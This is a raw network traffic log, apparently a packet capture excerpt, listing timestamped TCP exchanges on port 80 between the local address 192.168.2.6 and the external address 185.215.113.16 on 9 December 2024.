                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.944838047 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.944890976 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.945473909 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.945516109 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.945724010 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.945770979 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.946736097 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.946782112 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.947246075 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.947298050 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.947971106 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.948013067 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.948385954 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.948426008 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.948837042 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.948875904 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.949145079 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.949187994 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.950020075 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.950057983 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.950258970 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.950294971 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.950983047 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.950994968 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.951023102 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.951041937 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.952300072 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.952347040 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.952501059 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.952543974 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.953442097 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.953489065 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.953717947 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.953754902 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.954507113 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.954561949 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.954581022 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.954618931 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.955430984 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.955472946 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.956214905 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.956257105 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.956542015 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.956553936 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.956589937 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.957684040 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.957725048 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.958421946 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.958465099 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.958961010 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.959026098 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.959208012 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.959245920 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.959845066 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.959886074 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.960231066 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.960273981 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.961018085 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.961055040 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.961289883 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.961328030 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.962049007 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.962099075 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.962330103 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.962374926 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.963157892 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.963200092 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.963392973 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.963435888 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.964268923 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.964307070 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.964356899 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.964397907 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.965434074 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.965476990 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.966073036 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.966108084 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.966548920 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.966562033 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.966594934 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.966612101 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.967576981 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.967665911 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.968373060 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.968421936 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.968786001 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.968797922 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.968832016 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.968842030 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.970231056 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.970278978 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.970550060 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.970587015 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.970920086 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.971195936 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.971246004 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.971282005 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.972073078 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.972121954 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.972661972 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.972701073 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.973481894 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.973524094 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.973659992 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.973696947 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.974225998 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.974237919 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.974267006 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.975414991 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.975459099 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.975752115 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.975795031 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.976448059 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.976461887 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.976489067 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.976505995 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.977485895 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.977530003 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.977638006 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.977679968 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.978698015 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.978710890 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.978734970 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.978748083 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.979842901 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.979865074 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.979882956 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.979898930 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.980820894 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.980858088 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.981065989 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.981102943 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.982171059 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.982208014 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.982285976 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.982331038 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.983073950 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.983117104 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.983196974 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.983294964 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.984216928 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.984229088 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.984252930 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.984266996 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.985263109 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.985306025 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.985449076 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.985551119 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.986453056 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.986491919 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.986638069 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.986674070 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.987602949 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.987643957 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.987808943 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.987847090 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.988656044 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.988692999 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.989533901 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.989571095 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.989742994 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.989754915 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.989784002 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.989798069 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.990803957 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.990856886 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.991010904 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.991050005 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.992026091 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.992069960 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.992218971 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.992259979 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.993115902 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.993154049 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.993583918 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.993628025 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.994247913 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.994285107 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.128381014 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.128434896 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.128494024 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.128540039 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.128781080 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.128824949 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.129101038 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.129146099 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.129884005 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.129926920 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.130371094 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.130408049 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.130558968 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.130605936 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.131349087 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.131402016 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.131705046 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.131747007 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.132623911 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.132661104 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.132945061 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.132993937 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.133618116 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.133654118 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.133779049 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.133820057 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.134908915 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.134948015 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.134994030 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.135041952 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.135781050 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.135824919 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.136260033 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.136306047 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.136898041 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.136950016 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.137099028 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.137145996 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.138106108 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.138148069 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.138276100 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.138314009 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.139178991 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.139214993 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.139471054 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.139509916 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.140321016 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.140358925 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.140547037 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.140587091 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.141447067 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.141488075 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.141597033 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.141634941 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.142431974 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.142472029 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.143064022 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.143100977 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.143830061 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.143867016 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.143996000 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.144033909 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.144675016 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.144716024 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.145262957 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.145301104 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.145756960 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.145796061 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.145862103 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.145898104 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.146976948 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.147021055 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.147612095 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.147650003 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.148050070 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.148061991 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.148086071 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.148108006 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.149080992 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.149116993 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.149183035 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.149219036 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.150230885 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.150274992 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.150355101 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.150391102 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.151356936 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.151395082 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.151557922 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.151592970 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.152549982 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.152611017 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.152970076 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:37.153014898 CET4992380192.168.2.6185.215.113.16
